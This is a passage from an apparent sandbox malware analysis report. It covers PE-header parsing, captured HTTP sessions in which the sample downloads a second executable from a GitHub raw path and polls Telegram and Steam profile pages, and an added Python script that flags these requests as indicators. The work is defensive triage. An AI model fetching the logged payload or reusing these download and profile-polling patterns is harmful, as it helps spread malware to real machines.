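        "timestamp_utc": datetime.fromtimestamp(stamp, timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "is_dll": bool(chars & CHAR_DLL),
        "linker": f"{maj_link}.{min_link}",
        "size_of_code": size_of_code,
        "entry_point": entry,
        "base_of_code": base_code,
        "image_base": image_base,
        "file_alignment": file_align,
        "size_of_image": size_of_image,
        "size_of_headers": size_of_headers,
        "subsystem": subsystem,                   # 2 = Windows GUI, 3 = console
        "aslr": bool(dll_chars & DLL_DYNAMIC_BASE),
        "nx": bool(dll_chars & DLL_NX_COMPAT),
    }


def sanity_checks(hdr: dict, file_size: int) -> dict:
    """Cross-check the header against the size of the file the HTTP response carried."""
    return {
        # A linker-produced file is a whole number of FileAlignment units long.
        "size_aligned": file_size % hdr["file_alignment"] == 0,
        # The entry point should fall inside the code range the header announces.
        "entry_in_code": hdr["base_of_code"] <= hdr["entry_point"] < hdr["base_of_code"] + hdr["size_of_code"],
        # How much larger the mapped image is than the bytes on disk.
        "inflation": hdr["size_of_image"] / file_size,
    }


if __name__ == "__main__":
    header = parse_pe32_header(PAYLOAD_HEAD)
    for key, value in header.items():
        print(f"{key:16} {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key:16} {value}")
    print(sanity_checks(header, REPORTED_CONTENT_LENGTH))
```

What the parse gives a practitioner that the hex dump alone does not: a 32-bit GUI executable, linker version 14.0, five sections, a TimeDateStamp of 2024-12-02 10:27:33 UTC (three weeks before this analysis, if the stamp is genuine; it is trivially forgeable), entry point inside the announced code range, ASLR and DEP both opted out, and a SizeOfImage of 0x28b000 bytes, about 5.6 times the 476160 bytes downloaded, which a triage analyst would want explained before trusting any static view of the file.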


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.8  49710        149.154.167.99  443               6532  C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 07:52:19 UTC  85                 OUT        GET /m3wm0w HTTP/1.1
    Host: t.me
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 07:52:20 UTC  510                IN         HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Mon, 23 Dec 2024 07:52:20 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 9538
    Connection: close
    Set-Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323; expires=Tue, 24 Dec 2024 07:52:20 GMT; path=/; samesite=None; secure; HttpOnly
    Pragma: no-cache
    Cache-control: no-store
    X-Frame-Options: ALLOW-FROM https://web.telegram.org
    Content-Security-Policy: frame-ancestors https://web.telegram.org
    Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                        2024-12-23 07:52:20 UTC9538INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent
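Across the three sessions in this part of the report (the third follows below), the submitted sample fetches a second executable from raw.githubusercontent.com, and the dropped GUID-named executable then fetches a Telegram contact page and a Steam profile page, none of the requests carrying a User-Agent header. As an added example that is not part of the Joe Sandbox report, the script below re-types those three requests from the session tables (constructed input, copied field by field), re-parses them, checks that each request's length agrees with the "Bytes transferred" column, and applies request-level heuristics of the kind the report's signature list hints at. The host lists, the regular expression and the finding strings are this example's own, not the sandbox's signature logic.

```python
"""Request-level triage of the HTTP streams captured in sessions 1 to 3.

Added example, not part of the Joe Sandbox report. Inputs are re-typed from
the report's session tables; heuristics and lists are the example's own.
"""
import re

# (session, pid, process image, bytes the sandbox reported for the request, raw request)
CAPTURED_REQUESTS = [
    (1, 4044, r"C:\Users\user\Desktop\YYjRtxS70h.exe", 125,
     "GET /olosha1/pockket/refs/heads/main/jtkhikadjthsad.exe HTTP/1.1\r\n"
     "Host: raw.githubusercontent.com\r\n"
     "Connection: Keep-Alive\r\n"
     "\r\n"),
    (2, 6532, r"C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe", 85,
     "GET /m3wm0w HTTP/1.1\r\n"
     "Host: t.me\r\n"
     "Connection: Keep-Alive\r\n"
     "Cache-Control: no-cache\r\n"
     "\r\n"),
    (3, 6532, r"C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe", 119,
     "GET /profiles/76561199804377619 HTTP/1.1\r\n"
     "Host: steamcommunity.com\r\n"
     "Connection: Keep-Alive\r\n"
     "Cache-Control: no-cache\r\n"
     "\r\n"),
]

EXECUTABLE_SUFFIXES = (".exe", ".dll", ".scr")
# Raw-file endpoints of code-hosting services (example list, extend for your environment).
CODE_HOSTING_RAW = {"raw.githubusercontent.com", "gist.githubusercontent.com", "objects.githubusercontent.com"}
# Public profile/contact pages a headless non-browser process rarely needs (example list).
PROFILE_PAGES = {"t.me", "steamcommunity.com"}
# <drive>:\<one directory>\<GUID>.exe, the layout of the dropped file in session 2 and 3.
GUID_IMAGE = re.compile(r"^[a-z]:\\[^\\]+\\[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\.exe$", re.IGNORECASE)


def parse_request(raw: str) -> dict:
    """Split an HTTP/1.1 request head into its request line and a lower-cased header map."""
    head, sep, _body = raw.partition("\r\n\r\n")
    if not sep:
        raise ValueError("request head is not terminated by an empty line")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def triage(session: int, pid: int, image: str, reported_bytes: int, raw: str) -> dict:
    """Apply the example heuristics to one captured request and return IOC plus findings."""
    req = parse_request(raw)
    host = req["headers"].get("host", "").lower()
    findings = []
    # The sandbox counts the request head including the final CRLF; a mismatch means a bad transcription.
    if len(raw.encode("ascii")) != reported_bytes:
        findings.append("byte count differs from sandbox table")
    if "user-agent" not in req["headers"]:
        findings.append("no User-Agent header")
    if host in CODE_HOSTING_RAW and req["target"].lower().endswith(EXECUTABLE_SUFFIXES):
        findings.append("executable fetched from code-hosting raw endpoint")
    if host in PROFILE_PAGES and "user-agent" not in req["headers"]:
        findings.append("profile page fetched by non-browser client")
    if GUID_IMAGE.match(image):
        findings.append("GUID-named image in a top-level directory")
    return {"session": session, "pid": pid, "image": image, "ioc": f"{host}{req['target']}", "findings": findings}


def triage_all(requests=CAPTURED_REQUESTS) -> list:
    return [triage(*entry) for entry in requests]


if __name__ == "__main__":
    for result in triage_all():
        print(f"session {result['session']}  pid {result['pid']}  {result['ioc']}")
        for finding in result["findings"]:
            print(f"    - {finding}")
```

t.me and steamcommunity.com are legitimate services, so blocking the hosts is not the lesson; the actionable indicators are the full request targets (the GitHub path, the @m3wm0w contact, the Steam profile ID) and the process path, which is why the example returns them alongside the findings. Whether the dropped file uses those profile pages to resolve a further address is not something this section of the report establishes, so the example flags the fetch and leaves the interpretation to the analyst.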


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.8  49711        104.102.49.254  443               6532  C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 07:52:21 UTC  119                OUT        GET /profiles/76561199804377619 HTTP/1.1
    Host: steamcommunity.com
    Connection: Keep-Alive
    Cache-Control: no-cache
2024-12-23 07:52:22 UTC  1917               IN         HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Mon, 23 Dec 2024 07:52:22 GMT
    Content-Length: 35590
    Connection: close
    Set-Cookie: sessionid=a683bfea8aad978e31b0518e; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC16384INData Raw: 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6d 61 72 6b 65 74 2f 22 3e 0a 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22
                                                                                                                                                                                                                        Data Ascii: <a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem" href="https://steamcommunity.com/market/">Market</a><a class="submenuitem" href="
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC3768INData Raw: 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f
                                                                                                                                                                                                                        Data Ascii: </div><div class="profile_header_badgeinfo"><div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;focusable&quot;:true,&quot;clickOnActivate&quot;:true}" class="persona_level_btn" href="https://steamco
                                                                                                                                                                                                                        2024-12-23 07:52:22 UTC971INData Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
                                                                                                                                                                                                                        Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


Session ID: 4
Source IP: 192.168.2.8 | Source Port: 49714
Destination IP: 149.154.167.99 | Destination Port: 443
PID: 6532
Process: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:52:56 UTC | 143 | OUT | GET /m3wm0w HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
2024-12-23 07:52:56 UTC | 368 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 07:52:56 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9538
Connection: close
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-23 07:52:56 UTC | 9538 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


Session ID: 5
Source IP: 192.168.2.8 | Source Port: 49715
Destination IP: 104.102.49.254 | Destination Port: 443
PID: 6532
Process: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:52:58 UTC | 215 | OUT | GET /profiles/76561199804377619 HTTP/1.1
Host: steamcommunity.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
2024-12-23 07:52:59 UTC | 1733 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Mon, 23 Dec 2024 07:52:58 GMT
Content-Length: 35590
Connection: close
2024-12-23 07:52:59 UTC | 14651 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-23 07:52:59 UTC | 16384 | IN | Data Raw: 09 09 09 09 09 09 4d 61 72 6b 65 74 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74
Data Ascii: Market</a><a class="submenuitem" href="https://steamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About
2024-12-23 07:52:59 UTC | 3584 | IN | Data Raw: 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 38 30 34 33 37 37 36 31 39 2f 62 61 64 67 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 22 3e 4c 65 76 65 6c 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 20 6c 76 6c 5f 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 72 69 65 6e 64 50 6c 61 79 65 72 4c 65 76 65 6c 4e 75 6d 22 3e 30 3c
Data Ascii: OnActivate&quot;:true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199804377619/badges"><div class="persona_name persona_level">Level <div class="friendPlayerLevel lvl_0"><span class="friendPlayerLevelNum">0<
2024-12-23 07:52:59 UTC | 971 | IN | Data Raw: 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 70 72 69 76 61 63 79 5f 61 67 72 65 65 6d 65 6e 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 72 69
Data Ascii: "https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Pri


Session ID: 6
Source IP: 192.168.2.8 | Source Port: 49719
Destination IP: 149.154.167.99 | Destination Port: 443
PID: 6532
Process: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-23 07:53:32 UTC | 143 | OUT | GET /m3wm0w HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: stel_ssid=d6d3627e300141e072_9285031639468439323
2024-12-23 07:53:33 UTC | 368 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Mon, 23 Dec 2024 07:53:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 9538
Connection: close
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
2024-12-23 07:53:33 UTC | 9538 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6d 33 77 6d 30 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74
Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @m3wm0w</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.parent


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        7192.168.2.849720104.102.49.2544436532C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        2024-12-23 07:53:34 UTC215OUTGET /profiles/76561199804377619 HTTP/1.1
                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Cache-Control: no-cache
Cookie: sessionid=a683bfea8aad978e31b0518e; steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186
2024-12-23 07:53:35 UTC 1733 IN HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net 